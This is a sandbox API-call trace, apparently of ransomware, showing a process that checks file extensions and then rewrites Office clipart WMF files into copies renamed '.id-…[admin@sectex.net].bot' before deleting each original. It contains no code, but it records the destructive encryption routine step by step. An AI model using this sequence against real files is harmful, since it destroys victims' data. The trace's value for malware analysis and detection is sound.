	[0161.122] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.122] lstrlenW (lpString=".bz2") returned 4
	[0161.122] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.122] lstrlenW (lpString=".7z") returned 3
	[0161.122] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 63
	[0161.122] lstrlenW (lpString=".dbf") returned 4
	[0161.122] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 63
	[0161.122] lstrlenW (lpString=".1cd") returned 4
	[0161.122] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 63
	[0161.122] lstrlenW (lpString=".jpg") returned 4
	[0161.123] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 63
	[0161.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 63
	[0161.123] lstrlenW (lpString=".doc") returned 4
	[0161.123] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.123] lstrlenW (lpString=".docx") returned 5
	[0161.123] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0161.123] lstrlenW (lpString=".pdf") returned 4
	[0161.123] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.123] lstrlenW (lpString=".xls") returned 4
	[0161.123] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.123] lstrlenW (lpString=".xlsx") returned 5
	[0161.123] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0161.123] lstrlenW (lpString=".ppt") returned 4
	[0161.123] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 63
	[0161.123] lstrlenW (lpString=".zip") returned 4
	[0161.123] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.123] lstrlenW (lpString=".rar") returned 4
	[0161.123] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.123] lstrlenW (lpString=".bz2") returned 4
	[0161.123] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.123] lstrlenW (lpString=".7z") returned 3
	[0161.123] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 63
	[0161.123] lstrlenW (lpString=".dbf") returned 4
	[0161.123] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 63
	[0161.123] lstrlenW (lpString=".1cd") returned 4
	[0161.123] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.123] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 63
	[0161.123] lstrlenW (lpString=".jpg") returned 4
	[0161.124] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.124] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.124] lstrlenW (lpString="J0107302.WMF") returned 12
	[0161.124] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107302.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.125] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=4136) returned 1
	[0161.125] CloseHandle (hObject=0x3f0) returned 1
	[0161.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107302.wmf")) returned 0x20
	[0161.125] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107302.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107302.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.126] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.126] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107302.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0161.126] GetLastError () returned 0x0
	[0161.127] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1028, lpOverlapped=0x0) returned 1
	[0161.128] WriteFile (in: hFile=0x1b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1030, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1030, lpOverlapped=0x0) returned 1
	[0161.129] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.129] WriteFile (in: hFile=0x1b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.129] SetEndOfFile (hFile=0x1b4) returned 1
	[0161.129] CloseHandle (hObject=0x1b4) returned 1
	[0161.129] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.129] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.131] CloseHandle (hObject=0x3f0) returned 1
	[0161.132] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.132] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107302.wmf")) returned 1
	[0161.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 63
	[0161.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 63
	[0161.132] lstrlenW (lpString=".doc") returned 4
	[0161.132] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.132] lstrlenW (lpString=".docx") returned 5
	[0161.132] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0161.133] lstrlenW (lpString=".pdf") returned 4
	[0161.133] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.133] lstrlenW (lpString=".xls") returned 4
	[0161.133] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.133] lstrlenW (lpString=".xlsx") returned 5
	[0161.133] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0161.133] lstrlenW (lpString=".ppt") returned 4
	[0161.133] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 63
	[0161.133] lstrlenW (lpString=".zip") returned 4
	[0161.133] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.133] lstrlenW (lpString=".rar") returned 4
	[0161.133] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.133] lstrlenW (lpString=".bz2") returned 4
	[0161.133] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.133] lstrlenW (lpString=".7z") returned 3
	[0161.133] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 63
	[0161.133] lstrlenW (lpString=".dbf") returned 4
	[0161.133] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 63
	[0161.133] lstrlenW (lpString=".1cd") returned 4
	[0161.133] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 63
	[0161.133] lstrlenW (lpString=".jpg") returned 4
	[0161.133] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 63
	[0161.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 63
	[0161.133] lstrlenW (lpString=".doc") returned 4
	[0161.133] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.133] lstrlenW (lpString=".docx") returned 5
	[0161.133] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0161.134] lstrlenW (lpString=".pdf") returned 4
	[0161.134] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.134] lstrlenW (lpString=".xls") returned 4
	[0161.134] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.134] lstrlenW (lpString=".xlsx") returned 5
	[0161.134] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0161.134] lstrlenW (lpString=".ppt") returned 4
	[0161.134] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 63
	[0161.134] lstrlenW (lpString=".zip") returned 4
	[0161.134] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.134] lstrlenW (lpString=".rar") returned 4
	[0161.134] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.134] lstrlenW (lpString=".bz2") returned 4
	[0161.134] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.134] lstrlenW (lpString=".7z") returned 3
	[0161.134] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 63
	[0161.134] lstrlenW (lpString=".dbf") returned 4
	[0161.134] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 63
	[0161.134] lstrlenW (lpString=".1cd") returned 4
	[0161.134] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.134] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107302.WMF") returned 63
	[0161.134] lstrlenW (lpString=".jpg") returned 4
	[0161.134] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.134] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.134] lstrlenW (lpString="J0107308.WMF") returned 12
	[0161.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.135] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=15888) returned 1
	[0161.135] CloseHandle (hObject=0x3f0) returned 1
	[0161.138] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf")) returned 0x20
	[0161.138] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.138] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.138] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0161.139] GetLastError () returned 0x0
	[0161.139] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x3e10, lpOverlapped=0x0) returned 1
	[0161.141] WriteFile (in: hFile=0x1b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x3e20, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x3e20, lpOverlapped=0x0) returned 1
	[0161.142] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.142] WriteFile (in: hFile=0x1b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.142] SetEndOfFile (hFile=0x1b4) returned 1
	[0161.142] CloseHandle (hObject=0x1b4) returned 1
	[0161.142] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.142] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.144] CloseHandle (hObject=0x3f0) returned 1
	[0161.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.145] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107308.wmf")) returned 1
	[0161.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63
	[0161.145] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63
	[0161.145] lstrlenW (lpString=".doc") returned 4
	[0161.145] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.145] lstrlenW (lpString=".docx") returned 5
	[0161.145] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.145] lstrlenW (lpString=".pdf") returned 4
	[0161.145] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.145] lstrlenW (lpString=".xls") returned 4
	[0161.146] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.146] lstrlenW (lpString=".xlsx") returned 5
	[0161.146] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.146] lstrlenW (lpString=".ppt") returned 4
	[0161.146] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63
	[0161.146] lstrlenW (lpString=".zip") returned 4
	[0161.146] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.146] lstrlenW (lpString=".rar") returned 4
	[0161.146] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.146] lstrlenW (lpString=".bz2") returned 4
	[0161.146] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.146] lstrlenW (lpString=".7z") returned 3
	[0161.146] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63
	[0161.146] lstrlenW (lpString=".dbf") returned 4
	[0161.146] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63
	[0161.146] lstrlenW (lpString=".1cd") returned 4
	[0161.146] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63
	[0161.146] lstrlenW (lpString=".jpg") returned 4
	[0161.146] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63
	[0161.146] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63
	[0161.146] lstrlenW (lpString=".doc") returned 4
	[0161.146] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.146] lstrlenW (lpString=".docx") returned 5
	[0161.146] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.146] lstrlenW (lpString=".pdf") returned 4
	[0161.146] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.147] lstrlenW (lpString=".xls") returned 4
	[0161.147] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.147] lstrlenW (lpString=".xlsx") returned 5
	[0161.147] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.147] lstrlenW (lpString=".ppt") returned 4
	[0161.147] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63
	[0161.147] lstrlenW (lpString=".zip") returned 4
	[0161.147] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.147] lstrlenW (lpString=".rar") returned 4
	[0161.147] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.147] lstrlenW (lpString=".bz2") returned 4
	[0161.147] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.147] lstrlenW (lpString=".7z") returned 3
	[0161.147] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63
	[0161.147] lstrlenW (lpString=".dbf") returned 4
	[0161.147] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63
	[0161.147] lstrlenW (lpString=".1cd") returned 4
	[0161.147] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107308.WMF") returned 63
	[0161.147] lstrlenW (lpString=".jpg") returned 4
	[0161.147] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.147] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.147] lstrlenW (lpString="J0107314.WMF") returned 12
	[0161.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.148] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=10852) returned 1
	[0161.148] CloseHandle (hObject=0x3f0) returned 1
	[0161.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf")) returned 0x20
	[0161.148] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.149] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.149] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0161.149] GetLastError () returned 0x0
	[0161.149] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x2a64, lpOverlapped=0x0) returned 1
	[0161.151] WriteFile (in: hFile=0x1b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x2a70, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x2a70, lpOverlapped=0x0) returned 1
	[0161.152] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.152] WriteFile (in: hFile=0x1b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.152] SetEndOfFile (hFile=0x1b4) returned 1
	[0161.152] CloseHandle (hObject=0x1b4) returned 1
	[0161.152] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.152] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.157] CloseHandle (hObject=0x3f0) returned 1
	[0161.158] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.158] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107314.wmf")) returned 1
	[0161.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63
	[0161.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63
	[0161.159] lstrlenW (lpString=".doc") returned 4
	[0161.159] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.159] lstrlenW (lpString=".docx") returned 5
	[0161.159] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0161.159] lstrlenW (lpString=".pdf") returned 4
	[0161.159] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.159] lstrlenW (lpString=".xls") returned 4
	[0161.159] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.159] lstrlenW (lpString=".xlsx") returned 5
	[0161.159] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0161.159] lstrlenW (lpString=".ppt") returned 4
	[0161.159] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107314.WMF") returned 63
	[0161.159] lstrlenW (lpString=".zip") returned 4
	[0161.159] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.159] lstrlenW (lpString=".rar") returned 4
	[0161.159] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.159] lstrlenW (lpString=".bz2") returned 4
	[0161.159] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.159] lstrlenW (lpString=".7z") returned 3
	[0161.159] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
